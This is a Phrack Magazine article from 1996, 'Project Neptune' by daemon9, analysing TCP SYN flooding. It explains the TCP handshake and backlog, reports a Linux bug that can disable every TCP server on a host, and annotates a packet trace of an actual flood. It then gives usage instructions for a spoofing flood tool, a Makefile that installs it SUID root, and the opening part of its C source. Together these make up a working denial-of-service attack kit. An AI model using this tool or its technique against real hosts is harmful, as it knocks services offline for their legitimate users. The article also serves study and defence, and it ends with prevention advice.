| ==Phrack Magazine== |
|
|
| Volume Seven, Issue Forty-Eight, File 13 of 18 |
|
|
|
|
| [ Project Neptune ] |
|
|
| by daemon9 / route / infinity |
| for Phrack Magazine |
| July 1996 Guild Productions, kid |
|
|
| comments to route@infonexus.com |
|
|
|
|
| This project is a comprehensive analysis of TCP SYN flooding. You |
| may be wondering, why such a copious treatment of TCP SYN flooding? |
| Apparently, someone had to do it. That someone turned out to be me (I need |
| a real hobby). The SYNflood Project consists of this whitepaper, including |
| anotated network monitor dumps and fully functional robust Linux sourcecode. |
|
|
|
|
| --[ Introduction ]-- |
|
|
|
|
| TCP SYN flooding is a denial of service (DOS) attack. Like most DOS |
| attacks, it does not exploit a software bug, but rather a shortcoming in the |
| implemenation of a particular protocol. For example, mail bombing DOS attacks |
| work because most SMTP agents are dumb and will accept whatever is sent their |
| way. ICMP_ECHO floods exploit the fact that most kernels will simply reply to |
| ICMP_ECHO request packets one after another, ad inifintum. We will see that |
| TCP SYN flood DOS attacks work because of the current implementation of TCP's |
| connection establishment protocol. |
|
|
|
|
| --[ Overview ]-- |
|
|
|
|
| This whitepaper is intended as a complete introduction to TCP SYN |
| flooding (refered to hereafter as SYN flooding). It will cover the attack |
| in detail, including all relevant necessary background information. It is |
| organized into sections: |
|
|
| Section I. TCP Background Information |
| Section II. TCP Memory Structures and the Backlog |
| Section III. TCP Input Processing |
| Section IV. The Attack |
| Section V. Network Trace |
| Section VI. Neptune.c |
| Section VII. Discussion and Prevention |
| Section VIII. References |
|
|
| (Note that readers unfamiliar with the TCP/IP protocol suite may wish to first |
| read ftp://ftp.infonexus.com/pub/Philes/NetTech/TCP-IP/tcipIp.intro.txt.gz) |
|
|
|
|
| --[ The Players ]-- |
|
|
|
|
| A: Target host |
| X: Unreachable host |
| Z: Attacking host |
| Z(x): Attacker masquerading as the unreachable |
|
|
|
|
| --[ The Figures ]-- |
| |
|
|
| There are a few network transaction figures in the paper and |
| they are to be interpreted as per the following example: |
|
|
| tick host a control host b |
|
|
| tick: |
| A unit of time. There is no distinction made as to *how* much time |
| passes between ticks, just that time passes. It's generally not going to be |
| a great deal. |
| host a: |
| A machine particpating in a TCP-based conversation. |
| control: |
| This field shows any relevant control bits set in the TCP header and |
| the direction the data is flowing |
| host b: |
| A machine particpating in a TCP-based conversation. |
|
|
| For example: |
|
|
| 1 A ---SYN---> B |
|
|
| In this case, at the first refrenced point in time, host a is sending |
| a TCP segment to host b with the SYN bit on. Unless stated, we are generally |
| not concerned with the data portion of the TCP segment. |
|
|
|
|
|
|
| Section I. TCP Background Information |
|
|
|
|
|
|
| TCP is a connection-oriented, reliable transport protocol. TCP is |
| responsible for hiding network intricacies from the upper layers. A |
| connection-oriented protcol implies that the two hosts participating in a |
| discussion must first establish a connection before data may be exchanged. In |
| TCP's case, this is done with the three-way handshake. Reliability can be |
| provided in a number of ways, but the only two we are concerned with are data |
| sequencing and acknowledgement. TCP assigns sequence numbers to every byte in |
| every segment and acknowledges all data bytes recieved from the other end. |
| (ACK's consume a sequence number, but are not themselves ACK'd. That would be |
| ludicris.) |
|
|
|
|
| --[ TCP Connection Establishment ]-- |
|
|
|
|
| In order to exchange data using TCP, hosts must establish a connection. |
| TCP establishes a connection in a 3 step process called the 3-way handshake. |
| If machine A is running a client program and wishes to conect to a server |
| program on machine B, the process is as follows: |
|
|
| fig(1) |
| |
| 1 A ---SYN---> B |
|
|
| 2 A <---SYN/ACK--- B |
|
|
| 3 A ---ACK---> B |
|
|
| |
| At (1) the client is telling the server that it wants a connection. |
| This is the SYN flag's only purpose. The client is telling the server that |
| the sequence number field is valid, and should be checked. The client will |
| set the sequence number field in the TCP header to it's ISN (initial sequence |
| number). The server, upon receiving this segment (2) will respond with it's |
| own ISN (therefore the SYN flag is on) and an ACKnowledgement of the clients |
| first segment (which is the client's ISN+1). The client then ACK's the |
| server's ISN (3). Now data transfer may take place. |
|
|
| |
| --[ TCP Control Flags ]-- |
|
|
|
|
| There are six TCP control flags. We are only concerned with 3, but |
| the others are included for posterity: |
|
|
| *SYN: Synchronize Sequence Numbers |
| The synchronize sequence numbers field is valid. This flag is only |
| valid during the 3-way handshake. It tells the receiving TCP to check the |
| sequence number field, and note it's value as the connection-initiator's |
| (usually the client) initial sequence number. TCP sequence numbers can |
| simply be thought of as 32-bit counters. They range from 0 to 4,294,967,295. |
| Every byte of data exchanged across a TCP connection (along with certain |
| flags) is sequenced. The sequence number field in the TCP header will contain |
| the sequence number of the *first* byte of data in the TCP segment. |
|
|
| *ACK: Acknowledgement |
| The acknowledgement number field is valid. This flag is almost always |
| set. The acknowledgement number field in the TCP header holds the value of |
| the next *expected* sequence number (from the other side), and also |
| acknowledges *all* data (from the other side) up through this ACK number minus |
| one. |
|
|
| *RST: Reset |
| Destroy the referenced connection. All memory structures are torn |
| down. |
|
|
| URG: Urgent |
| The urgent pointer is valid. This is TCP's way of implementing out |
| of band (OOB) data. For instance, in a telnet connection a `ctrl-c` on the |
| client side is considered urgent and will cause this flag to be set. |
|
|
| PSH: Push |
| The receiving TCP should not queue this data, but rather pass it to |
| the application as soon as possible. This flag should always be set in |
| interactive connections, such as telnet and rlogin. |
|
|
| FIN: Finish |
| The sending TCP is finished transmitting data, but is still open to |
| accepting data. |
|
|
|
|
| --[ Ports ]-- |
| |
| |
| To grant simultaneous access to the TCP module, TCP provides a user |
| interface called a port. Ports are used by the kernel to identify network |
| processes. They are strictly transport layer entities. Together with an |
| IP address, a TCP port provides provides an endpoint for network |
| communications. In fact, at any given moment *all* Internet connections can |
| be described by 4 numbers: the source IP address and source port and the |
| destination IP address and destination port. Servers are bound to |
| 'well-known' ports so that they may be located on a standard port on |
| different systems. For example, the telnet daemon sits on TCP port 23. |
| |
|
|
|
|
| Section II. TCP Memory Structures and the Backlog |
|
|
| |
|
|
| For a copius treatment of the topic of SYN flooding, it is necessary |
| to look at the memory structures that TCP creates when a client SYN arrives |
| and the connection is pending (that is, a connection that is somewhere in |
| the process of the three-way handshake and TCP is in the SYN_SENT or |
| SYN_RVCD state). |
|
|
|
|
| --[ BSD ]-- |
|
|
|
|
| Under BSD style network code, for any given pending TCP connection |
| there are three memory structures that are allocated (we do not discuss the |
| process (proc) structure and file structure, but the reader should be aware |
| that they exist as well.): |
|
|
| Socket Structure (socket{}): |
| Holds the information related to the local end of the communications |
| link: protocol used, state information, addressing information, connection |
| queues, buffers, and flags. |
|
|
| Internet Protocol Control Block Structure (inpcb{}): |
| PCB's are used at the transport layer by TCP (and UDP) to hold various |
| pieces of information needed by TCP. They hold: TCP state information, IP |
| address information, port numbers, IP header prototype and options and a |
| pointer to the routing table entry for the destination address. PCB's are |
| created for a given TCP based server when the server calls listen(), |
|
|
| TCP Control Block Structure (tcpcb{}): |
| The TCP control block contains TCP specific information such as timer |
| information, sequence number information, flow control status, and OOB data. |
|
|
|
|
| --[ Linux ]-- |
|
|
|
|
| Linux uses a different scheme of memory allocation to hold network |
| information. The socket structure is still used, but instead of the pcb{} |
| and tcpcb{}, we have: |
|
|
| Sock Structure (sock{}): |
| Protocol specific information, most of the data structures are TCP |
| related. This is a huge structure. |
|
|
| SK Structure (sk_buff{}): |
| Holds more protocol specific information including packet header |
| information, also contains a sock{}. |
|
|
| According to Alan Cox: |
| The inode is the inode holding the socket (this may be a dummy inode |
| for non file system sockets like IP), the socket holds generic high level |
| methods and the struct sock is the protocol specific object, although all but |
| a few experimental high performance items use the same generic struct sock and |
| support code. That holds chains of linear buffers (struct sk_buff's). |
|
|
| [ struct inode -> struct socket -> struct sock -> chains of sk_buff's ] |
|
|
|
|
| --[ The Backlog Queue]-- |
|
|
| |
| These are large memory structures. Every time a client SYN arrives |
| on a valid port (a port where a TCP server is listen()ing), they must be |
| allocated. If there were no limit, a busy host could easily exhuast all of |
| it's memory just trying to process TCP connections. (This would be an even |
| simpler DOS attack.) However, there is an upper limit to amount of |
| concurrent connection requests a given TCP can have outstanding for a |
| given socket. This limit is the backlog and it is the length of the queue |
| where incoming (as yet incomplete) connections are kept. This queue limit |
| applies to both the number of imcomplete connections (the 3-way handshake has |
| not been completed) and the number of completed connections that have not |
| been pulled from the queue by the application by way of the accept() call. |
| If this backlog limit is reached, we will see that TCP will silently |
| discard all incoming connection requests until the pending connections can |
| be dealt with. |
| The backlog is not a large value. It does not have to be. Normally |
| TCP is quite expedient in connection establishment processing. Even if a |
| connection arrived while the queue was full, in all likelyhood, when the |
| client retransmits it's connection request segment, the receiving TCP will |
| have room again in it's queue. Different TCP implementations have different |
| backlog sizes. Under BSD style networking code, there is also 'grace' margin |
| of 3/2. That is, TCP will allow up to backlog*3/2+1 connections. This will |
| allow a socket one connection even if it calls listen with a backlog of 0. |
| Some common backlog values: |
| fig(2) |
|
|
| OS Backlog BL+Grace Notes |
| --------------------------------------------------------------------------- |
| SunOS 4.x.x: 5 8 |
| IRIX 5.2: 5 8 |
| Solaris |
| Linux 1.2.x: 10 10 Linux does not have this grace margin. |
| FreeBSD 2.1.0: 32 |
| FreeBSD 2.1.5: 128 |
| Win NTs 3.5.1: 6 6 NT does not appear to have this margin. |
| Win NTw 4.0: 6 6 NT has a pathetic backlog. |
|
|
|
|
|
|
| Section III. TCP Input Processing |
|
|
|
|
| |
| To see exactly where the attack works it is necessary to watch as |
| the receiving TCP processes an incoming segment. The following is true for |
| BSD style networking, and only processes relevant to this paper are |
| discussed. |
|
|
| A packet arrives and is demultiplexed up the protocol stack to TCP. The TCP |
| state is LISTEN: |
|
|
| Get header information: |
| TCP retrieves the TCP and IP headers and stores the information in |
| memory. |
| Verify the TCP checksum: |
| The standard Internet checksum is applied to the segment. If it |
| fails, no ACK is sent, and the segment is dropped, assuming the client will |
| retranmit it. |
| Locate the PCB{}: |
| TCP locates the pcb{} associated with the connection. If it is not |
| found, TCP drops the segment and sends a RST. (Aside: This is how TCP |
| handles connections that arrive on ports with no server listen()ing.) If |
| the PCB{} exists, but the state is CLOSED, the server has not called |
| connect() or listen(). The segment is dropped, but no RST is sent. The |
| client is expected to retransmit it's connection request. We will see this |
| occurence when we discuss the 'Linux Anomaly'. |
| Create new socket: |
| When a segment arrives for a listen()ing socket, a slave socket is |
| created. This is where a socket{}, tcpcb{}, and another pcb{} are created. |
| TCP is not committed to the connection at this point, so a flag is set to |
| cause TCP to drop the socket (and destroy the memory structures) if an |
| error is encountered. If the backlog limit is reached, TCP considers this |
| an error, and the connection is refused. We will see that this is exactly |
| why the attack works. Otherwise, the new socket's TCP state is LISTEN, and |
| the completion of the passive open is attempted. |
| Drop if RST, ACK, or no SYN: |
| If the segment contains a RST, it is dropped. If it contains an |
| ACK, it is dropped, a RST is sent and the memory structures torn down (the |
| ACK makes no sense for the connection at this point, and is considered an |
| error). If the segment does not have the SYN bit on, it is dropped. If |
| the segment contains a SYN, processing continues. |
| Address processing, etc: |
| TCP then gets the clients address information into a buffer and |
| connects it's pcb{} to the client, processes any TCP options, and |
| initializes it's initial send sequence (ISS) number. |
| ACK the SYN: |
| TCP sends a SYN, ISS and an ACK to the client. The connection |
| establishment timer is set for 75 seconds at this point. The state changes |
| to SYN_RCVD. Now. TCP is commited to the socket. We will see that this |
| is state the target TCP will be in when in the throes of the attack because |
| the expected client response is never received. The state remains SYN_RCVD |
| until the connection establishment timer expires, in which case the all the |
| memory structures associated with the connection are destroyed, and the |
| socket returns to the LISTEN state. |
|
|
| |
|
|
| Section IV. The Attack |
|
|
|
|
| |
| A TCP connection is initiated with a client issuing a request to a |
| server with the SYN flag on in the TCP header. Normally the server will |
| issue a SYN/ACK back to the client identified by the 32-bit source address in |
| the IP header. The client will then send an ACK to the server (as we |
| saw in figure 1 above) and data transfer can commence. When the client IP |
| address is spoofed to be that of an unreachable, host, however, the targetted |
| TCP cannot complete the 3-way handshake and will keep trying until it times |
| out. That is the basis for the attack. |
| The attacking host sends a few (we saw that as little as 6 is |
| enough) SYN requests to the target TCP port (for example, the telnet daemon). |
| The attacking host also must make sure that the source IP-address is spoofed |
| to be that of another, currently unreachable host (the target TCP will be |
| sending it's response to this address). IP (by way of ICMP) will inform TCP |
| that the host is unreachable, but TCP considers these errors to be transient |
| and leaves the resolution of them up to IP (reroute the packets, etc) |
| effectively ignoring them. The IP-address must be unreachable because the |
| attacker does not want *any* host to recieve the SYN/ACKs that will be coming |
| from the target TCP, which would elicit a RST from that host (as we saw in |
| TCP input above). This would foil the attack. The process is as follows: |
|
|
| fig(3) |
|
|
| 1 Z(x) ---SYN---> A |
|
|
| Z(x) ---SYN---> A |
|
|
| Z(x) ---SYN---> A |
|
|
| Z(x) ---SYN---> A |
|
|
| Z(x) ---SYN---> A |
|
|
| Z(x) ---SYN---> A |
|
|
|
|
| 2 X <---SYN/ACK--- A |
|
|
| X <---SYN/ACK--- A |
|
|
| ... |
|
|
| 3 X <---RST--- A |
|
|
|
|
| At (1) the attacking host sends a multitude of SYN requests to the target |
| to fill it's backlog queue with pending connections. (2) The target responds |
| with SYN/ACKs to what it believes is the source of the incoming SYNs. During |
| this time all further requests to this TCP port will be ignored. The target |
| port is flooded. |
|
|
|
|
| --[ Linux Anomaly ]-- |
|
|
|
|
| In doing my research for this project, I noticed a very strange |
| implementation error in the TCP module of Linux. When a particular TCP |
| server is flooded on a Linux host, strange things are afoot... First, it |
| appears that the connection-establishment timer is broken. The 10 spoofed |
| connection-requests keep the sockets in the SYN_RCVD state for just |
| over 20 minutes (23 minutesto be exact. Wonder what the signifigance of |
| this is... Hmmm...). Much longer than the 75-seconds it *should* be. The |
| next oddity is even more odd... After that seemingly arbitrary time period |
| (I have to determine what the hell is going on there), TCP moves the flooded |
| sockets into the CLOSE state, where they *stay* until a connection-request |
| arrives on a *different* port. If a connection-request arrives on the |
| flooded port (now in the CLOSE state), it will not answer, acting as if it |
| is still flooded. After the connection-request arrives on a different port, |
| the CLOSEd sockets will be destroyed, and the original flooded port will be |
| free to answer requests again. It seems as though the connection-request |
| will spark the CLOSEd sockets into calling listen()... Damn wierd if you ask |
| me... |
| The implications of this are severe. I have been able to completely |
| disable all TCP based servers from answering requests indefinitely. If all |
| the TCP servers are flooded, there are none to recieve the valid connection |
| request to alleviate the CLOSE state from the flooded connections. Bad |
| news indeed. |
| [Note: as of 7.15.96 this is a conundrum. I have contacted Alan |
| Cox and Eric Schenk and plan to work with them on a solution to this |
| problem. I be forthcoming with all our findings as soon as possible. I |
| believe the problem to perhaps lie (at least in part) in the |
| tcp_close_pending() function... Or perhaps there is a logic error in how |
| TCP switches between the connection-establishment timer and the |
| keep-alive timer. They are both implemented using the same variable since |
| they are mutally exclusive...] |
|
|
|
|
| |
|
|
| Section V. Network Trace |
|
|
| |
|
|
| The following is a network trace from an actual SYN flooding session. |
| The target machine is Ash, a Linux 1.2.13 box. The attacker is Onyx. The |
| network is a 10Mbps ethernet. |
|
|
| Network Monitor trace Fri 07/12/96 10:23:34 Flood1.TXT |
|
|
| Frame Time Src MAC Addr Dst MAC Addr Protocol Description Src Other Addr Dst Other Addr Type Other Addr |
|
|
| 1 2.519 onyx ash TCP/23 ....S., len: 4, seq:3580643269, ack:1380647758, win: 512, src 192.168.2.2 192.168.2.7 IP |
| 2 2.520 ash onyx TCP/1510 .A..S., len: 4, seq: 659642873, ack:3580643270, win:14335, src 192.168.2.7 192.168.2.2 IP |
| 3 2.520 onyx ash TCP/23 .A...., len: 0, seq:3580643270, ack: 659642874, win:14260, src 192.168.2.2 192.168.2.7 IP |
|
|
| A telnet client is started on Onyx, and we see the standard 3-way |
| handshake between the two hosts for the telnet session. |
|
|
| Lines 4-126 were interactive telnet traffic and added nothing to the |
| discussion. |
|
|
| 127 12.804 ash onyx TCP/1510 .A...F, len: 0, seq: 659643408, ack:3580643401, win:14335, src 192.168.2.7 192.168.2.2 IP |
| 128 12.804 onyx ash TCP/23 .A...., len: 0, seq:3580643401, ack: 659643409, win:14322, src 192.168.2.2 192.168.2.7 IP |
| 129 12.805 onyx ash TCP/23 .A...F, len: 0, seq:3580643401, ack: 659643409, win:14335, src 192.168.2.2 192.168.2.7 IP |
| 130 12.805 ash onyx TCP/1510 .A...., len: 0, seq: 659643409, ack:3580643402, win:14334, src 192.168.2.7 192.168.2.2 IP |
|
|
| Here we see the 4-way connection termination procedure. |
|
|
| At this point, the flood program is started on onyx, the information |
| filled in, and the attack is launched. |
| |
| 131 42.251 onyx *BROADCAST ARP_RARP ARP: Request, Target IP: 192.168.2.7 |
|
|
| Onyx is attempting to get ash's ethernet address using ARP. |
| |
| 132 42.251 ash onyx ARP_RARP ARP: Reply, Target IP: 192.168.2.2 Target Hdwr Addr: 0020AF2311D7 |
|
|
| Ash responds with it's ethernet address. |
|
|
| 133 42.252 onyx ash TCP/23 ....S., len: 0, seq:3364942082, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP |
|
|
| The flood begins. Onyx sends the first of 10 TCP segments with the |
| SYN bit on, and the IP address spoofed to the telnet daemon. |
|
|
| 134 42.252 ash *BROADCAST ARP_RARP ARP: Request, Target IP: 192.168.2.10 |
|
|
| Ash immediately attempts to resolve the ethernet address. However, |
| since there is no such host on the network (and no router to proxy |
| the request with) the ARP request will not be answered. The host, |
| is in effect, unreachable. |
|
|
| 135 42.271 onyx ash TCP/23 ....S., len: 0, seq:3381719298, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP |
| 136 42.291 onyx ash TCP/23 ....S., len: 0, seq:3398496514, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP |
| 137 42.311 onyx ash TCP/23 ....S., len: 0, seq:3415273730, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP |
| 138 42.331 onyx ash TCP/23 ....S., len: 0, seq:3432050946, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP |
| 139 42.351 onyx ash TCP/23 ....S., len: 0, seq:3448828162, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP |
| 140 42.371 onyx ash TCP/23 ....S., len: 0, seq:3465605378, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP |
| 141 42.391 onyx ash TCP/23 ....S., len: 0, seq:3482382594, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP |
| 142 42.411 onyx ash TCP/23 ....S., len: 0, seq:3499159810, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP |
| 143 42.431 onyx ash TCP/23 ....S., len: 0, seq:3515937026, ack: 0, win: 242, src 192.168.2.10 192.168.2.7 IP |
|
|
| The next 9 of 10 SYNs. The telnet daemon on ash is now flooded. |
| At this point, another telnet client is started on Onyx. |
|
|
| 144 47.227 onyx *BROADCAST ARP_RARP ARP: Request, Target IP: 192.168.2.7 |
|
|
| Onyx is again attempting to get ash's ethernet address using ARP. |
| Hmmm, this entry should be in the arp cache. I should look into |
| this. |
|
|
| 145 47.228 ash onyx ARP_RARP ARP: Reply, Target IP: 192.168.2.2 Target Hdwr Addr: 0020AF2311D7 |
|
|
| Here is the ARP reply. |
|
|
| 146 47.228 onyx ash TCP/23 ....S., len: 4, seq:3625358638, ack: 0, win: 512, src 192.168.2.2 192.168.2.7 IP |
| 147 50.230 onyx ash TCP/23 ....S., len: 4, seq:3625358638, ack: 0, win:14335, src 192.168.2.2 192.168.2.7 IP |
| 148 56.239 onyx ash TCP/23 ....S., len: 4, seq:3625358638, ack: 0, win:14335, src 192.168.2.2 192.168.2.7 IP |
|
|
| Onyx is attempting to establish a connection with the telnet daemon |
| on Ash, which is, as we saw, flooded. |
|
|
| 149 67.251 ash *BROADCAST ARP_RARP ARP: Request, Target IP: 192.168.2.10 |
|
|
| Ash is still trying to get the ethernet address of the spoofed host. |
| In vain... |
|
|
| 150 68.247 onyx ash TCP/23 ....S., len: 4, seq:3625358638, ack: 0, win:14335, src 192.168.2.2 192.168.2.7 IP |
| 151 92.254 onyx ash TCP/23 ....S., len: 4, seq:3625358638, ack: 0, win:14335, src 192.168.2.2 192.168.2.7 IP |
|
|
| Onyx is still transmitting it's connection-estabishment requests... |
| Also in vain. |
|
|
| 152 92.258 ash *BROADCAST ARP_RARP ARP: Request, Target IP: 192.168.2.10 |
|
|
| Hello? Are you out there? |
|
|
|
|
|
|
| Section VI. Neptune.c |
|
|
|
|
| |
| Neptune.c is the companion code. It does everything we've talked |
| about, and more. Neptune.c is admittedly more complex than it needs to |
| be. I included several features that are not essential, but make the |
| program more robust. The program features: simple to use menuing system, an |
| alternative command line interface for easy integration into scripts, |
| ICMP_ECHO requesting to query if unreachable is in fact unreachable (AKA |
| 'ping'ing), infinity mode (read the code) and a daemon mode with (psuedo) |
| random unreachable IP address choosing. |
|
|
| The menu is really self explanatory... |
|
|
| 1 Enter target host |
|
|
| Enter yur target. If you are confused at this point, kill yurself. |
|
|
| 2 Enter source (unreachable) host |
|
|
| Enter the puported sender. It is integral that this host be routable but not |
| reachable. Remember that the address must be a unicast address. If it is a |
| broadcast or multicast address it will be dropped by the target TCP. |
|
|
| 3 Send ICMP_ECHO(s) to unreachable |
|
|
| Make sure that yur puported sender is in fact unreachable. This is not 100% |
| reliable as A) ICMP packets can be dropped by the unreliable network layer, |
| B) the host may filter out ICMP_ECHO packets. |
|
|
| 4 Enter port number to flood |
| |
| The target port to flood. There is an infinity switch. |
|
|
| 5 Enter number of SYNs |
| |
| The number of SYNs to send. Remember, this attack is not bandwidth hungry, |
| sending more packets than neccessary is totally useless. |
|
|
| 6 Quit |
| |
| Bye, bye. |
|
|
| 7 Lanuch |
| |
| Fire when ready. |
|
|
| 8 Daemonize (may or may not be implemented in yur version) |
|
|
| Puts the program in dameon mode. It forks to the background and does it's |
| evilness there. Needs two more options: packet sending interval, and time |
| for daemon to live. Recommended packet sending interval is at least every |
| 90 seconds, depending on the target TCP. 80 should work fine, as the |
| connection establishment timer is 75 seconds. Daemon lifetime is up to you. |
| Be kind. |
| Also the daemon portion includes routines to optionally make use |
| of a file of unreachable IP addresses and (pseudo) randomly choose from |
| them. The program reads the file and builds a dynamic array of these IP |
| addresses in network byte order and then uses rand (seeded from the time of |
| day in seconds --we don't need alot of entropy here, this isn't |
| cryptography--) to generate a number and then it mods that number by the |
| number of entries in the table to hash to a particular IP address. |
|
|
| Since the program opens raw sockets, it needs to run as root. By |
| default, it is installed SUID root in /usr/local/bin/neptune with the access |
| list in /etc/sfaccess.conf. The authentication mechanism works by checking |
| the usernames (via UID) of the attempted flooders. It is not a complex |
| algorithm, and in fact the code is quite simple (asside: If anyone can find |
| any security problems with the program being SUID root, --above the fact |
| that the program is admittedly evil-- I would love to hear about them). Root |
| is the only entry the access file starts off with. |
| For the program to work, you need to remove the comment marks from |
| line 318 (the actual sendto() call where the forged datagrams are sent). I |
| did that so the fools simply interested in causing trouble (and not interested |
| in learning) would find the program mostly useless. |
|
|
|
|
|
|
| Section VII. Discussion and Prevention |
|
|
|
|
|
|
| As we have seen, the attack works because TCP is attempting to do it's |
| job of providing a reliable transport. TCP must establish a connection first, |
| and this is where the weakness lies. (T/TCP is immune to this attack via TAO. |
| See my future paper: `The Next Generation Internet` for information on T/TCP |
| and IPng.) Under normal circumstances, assuming well-behaved networking |
| software, the worst that can happen is a TCP-based server may be wrapped up in |
| legimate connection-establishment processing and a few clients may have to |
| retransmit thier SYNs. But, a misbegotten client program can exploit this |
| connection-establishment weakness and down a TCP-based server with only a few |
| doctored segments. |
| The fact that SYN flooding requires such a small amount of network |
| traffic to be so effective is important to note. Consider other network |
| DOS attacks such as ICMP_ECHO floods (ping floods), mail bombs, mass mailing |
| list subscriptions, etc... To be effective, all of these attacks require |
| an attacker to transmit volumous amounts of network traffic. Not only does |
| this make these attacks more noticable on both ends by decreasing the amount |
| of available bandwidth (as such, often these attacks are waged from compromised |
| machines) but it also adds to the general traffic problems of the Internet. |
| SYN flooding can be deadly effective with as little as 360 packets/hour. |
| |
|
|
| --[ Prevention ]-- |
|
|
|
|
| Ok, so how do we stop it? Good question. |
|
|
|
|
| --[ TCPd ]-- |
|
|
|
|
| TCP wrappers are almost useless. The magic they do is based on the |
| validity of the source IP-address of incoming datagrams. As we know, this can |
| be spoofed to whatever the attacker desires. Unless the target has denied |
| traffic from *everywhere* except known hosts, TCP wrappers will not save you. |
|
|
|
|
| --[ Increase the Backlog ]-- |
|
|
|
|
| Increasing the default backlog is not much of a solution. In |
| comparision with the difficulty of an attacker simply sending more packets, |
| the memory requirements of the additional connection-establishment structures |
| is prohibitively expensive. At best it is an obfuscative (word check...?) |
| measure. |
|
|
|
|
| --[ Packet Filtering ]-- |
| |
|
|
| A smart packet filter (or kernel modification) of some kind may be |
| a viable solution. Briefly: |
|
|
| - Host keeps a recent log of incoming packets with the `SYN` bit on in a |
| linked list structure. |
| - The linked list cannot be permitted to grow without bound (another DOS |
| attack would present itself) |
| - When x amount of SYNs are received on a socket, certain characteristics |
| about the packets are compared, (Source port, source IP address, sequence |
| numbers, window size, etc) and if things seem fishy, the connection |
| requests and associated memory structures are immediately destroyed. |
|
|
|
|
|
|
| Section VIII. References |
|
|
|
|
|
|
| Ppl: A. Cox, R. Stevens |
| Books: TCP Illustrated vols II,III |
| |
|
|
|
|
| This project made possible by a grant from the Guild Corporation. |
|
|
| EOF |
|
|
|
|
| ------------------------8<-------------------------------------------- |
|
|
|
|
| # Neptune Makefile |
| # daemon9, 1996 Guild Productions |
|
|
| all: |
| @gcc -o neptune neptune.c |
| @echo "" |
| @echo "'make install' will install the program..." |
| @echo "" |
| @echo "Warning! Neptune is installed SUID root by default!" |
| @echo "" |
| @echo "route@infonexus.com / Guild Corporation" |
| install: |
| strip ./neptune |
| mv ./neptune /usr/local/bin/neptune |
| chmod 4755 /usr/local/bin/neptune |
| @echo "root" > /etc/sfaccess.conf |
| @echo "Installation complete, access list is /etc/sfaccess.conf" |
| clean: |
| @rm -f *.o neptune /etc/sfaccess.conf |
|
|
|
|
| ------------------------8<-------------------------------------------- |
|
|
|
|
| /* |
| Neptune |
| v. 1.5 |
|
|
| daemon9/route/infinity |
|
|
| June 1996 Guild productions |
|
|
| comments to daemon9@netcom.com |
| |
| If you found this code alone, without the companion whitepaper |
| please get the real-deal: |
| ftp.infonexus.com/pub/SourceAndShell/Guild/Route/Projects/Neptune/neptune.tgz |
| |
| Brief synopsis: |
| Floods the target host with TCP segments with the SYN bit on, |
| puportedly from an unreachable host. The return address in the |
| IP header is forged to be that of a known unreachable host. The |
| attacked TCP, if flooded sufficently, will be unable to respond |
| to futher connects. See the accompanying whitepaper for a full |
| treatment of the topic. (Also see my paper on IP-spoofing for |
| information on a related subject.) |
|
|
| Usage: |
| Figure it out, kid. Menu is default action. Command line usage is |
| available for easy integration into shell scripts. If you can't |
| figure out an unreachable host, the program will not work. |
|
|
| Gripes: |
| It would appear that flooding a host on every port (with the |
| infinity switch) has it's drawbacks. So many packets are trying to |
| make their way to the target host, it seems as though many are |
| dropped, especially on ethernets. Across the Internet, though, the |
| problem appears mostly mitigated. The call to usleep appears to fix |
| this... Coming up is a port scanning option that will find open |
| ports... |
|
|
| Version History: |
| 6/17/96 beta1: SYN flooding, Cmd line and crude menu, ICMP stuff broken |
| 6/20/96 beta2: Better menu, improved SYN flooding, ICMP fixed... sorta |
| 6/21/96 beta3: Better menu still, fixed SYN flood clogging problem |
| Fixed some name-lookup problems |
| 6/22/96 beta4: Some loop optimization, ICMP socket stuff changed, ICMP |
| code fixed |
| 6/23/96 1.0: First real version... |
| 6/25/96 1.1: Cleaned up some stuff, added authentication hooks, fixed up |
| input routine stuff |
| 7/01/96 1.5: Added daemonizing routine... |
|
|
| This coding project made possible by a grant from the Guild corporation |
|
|
| */ |
|
|
| #include <stdio.h> |
| #include <stdlib.h> |
| #include <string.h> |
| #include <syslog.h> |
| #include <pwd.h> |
| #include <unistd.h> |
| #include <netinet/in.h> |
| #include <arpa/inet.h> |
| #include <netdb.h> |
| #include <sys/socket.h> |
| #include <sys/ioctl.h> |
| #include <fcntl.h> |
| #include <time.h> |
| #include <linux/signal.h> |
| #include <linux/ip.h> |
| #include <linux/tcp.h> |
| #include <linux/icmp.h> |
|
|
| #define BUFLEN 256 |
| #define MENUBUF 64 |
| #define MAXPORT 1024 |
| #define MAXPAK 4096 |
| #define MENUSLEEP 700000 |
| #define FLOODSLEEP 100 /* Ethernet, or WAN? Yur mileage will vary.*/ |
| #define ICMPSLEEP 100 |
| #define ACCESSLIST "/etc/sfaccess.conf" |
|
|
| int HANDLERCODE=1; |
| int KEEPQUIET=0; |
| char werd[]={"\nThis code made possible by a grant from the Guild Corporation\n\0"}; |
| |
| void main(argc,argv) |
| int argc; |
| char *argv[]; |
| { |
| |
| void usage(char *); |
| void menu(int,char *); |
| void flood(int,unsigned,unsigned,u_short,int); |
| unsigned nameResolve(char *); |
| int authenticate(int,char *); |
| |
| unsigned unreachable,target; |
| int c,port,amount,sock1,fd; |
| struct passwd *passEnt; |
| char t[20],u[20]; |
|
|
| if((fd=open(ACCESSLIST,O_RDONLY))<=0){ |
| perror("Cannot open accesslist"); |
| exit(1); |
| } |
| setpwent(); |
| passEnt=getpwuid(getuid()); |
| endpwent(); |
| /* Authenticate */ |
| if(!authenticate(fd,passEnt->pw_name)){ |
| fprintf(stderr,"Access Denied, kid\n"); |
| exit(0); |
| } |
| /* Open up a RAW socket */ |
|
|
| if((sock1=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){ |
| perror("\nHmmm.... socket problems\n"); |
| exit(1); |
| } |
| if(argc==1){ |
| menu(sock1,passEnt->pw_name); |
| exit(0); |
| } |
| /* Parse command-line arguments */ |
| while((c=getopt(argc,argv,"8:s:t:p:a"))){ |
| switch(c){ |
| case 's': /* Source (spoofed) host */ |
| unreachable=nameResolve(optarg); |
| strcpy(u,optarg); |
| break; |
| case 't': /* Target host */ |
| target=nameResolve(optarg); |
| strcpy(t,optarg); |
